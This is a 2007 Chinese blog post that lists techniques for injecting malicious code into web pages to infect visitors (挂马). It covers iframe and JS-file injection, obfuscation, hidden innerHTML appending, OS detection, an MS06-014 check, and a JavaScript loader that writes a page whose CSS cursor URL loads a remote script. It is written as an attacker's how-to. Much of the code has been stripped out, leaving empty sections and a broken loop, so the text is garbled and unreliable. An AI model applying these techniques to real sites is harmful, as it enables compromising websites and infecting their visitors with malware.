Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1425924
  • 博文数量: 463
  • 博客积分: 10540
  • 博客等级: 上将
  • 技术积分: 5450
  • 用 户 组: 普通用户
  • 注册时间: 2006-11-12 08:30
文章分类

全部博文(463)

文章存档

2014年(2)

2012年(14)

2011年(42)

2010年(18)

2009年(78)

2008年(35)

2007年(182)

2006年(92)

我的朋友

分类: 网络与安全

2007-11-19 09:37:30

一:框架挂马
 
二:js文件挂马
首先将以下代码
document.write("");
保存为xxx.js,
则JS挂马代码为
 
三:js变形加密
 
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n

 
九:伪装调用:



 
十:高级欺骗
页面要显示的内容
 
十一:判断系统代码

404




 
十二:判断是否有ms06014代码
 
十三:智能读取js的代码demo
//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("");
document.writeln("");
document.writeln("");
document.writeln("");
document.writeln("<\/HEAD>");
document.writeln(" ");
document.writeln("
");
document.writeln("
document.writeln("style=\"CURSOR: url(\'http:\/\/\/demo.js\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")
//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; ivar loPm = loallPm[i].split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}
阅读(936) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~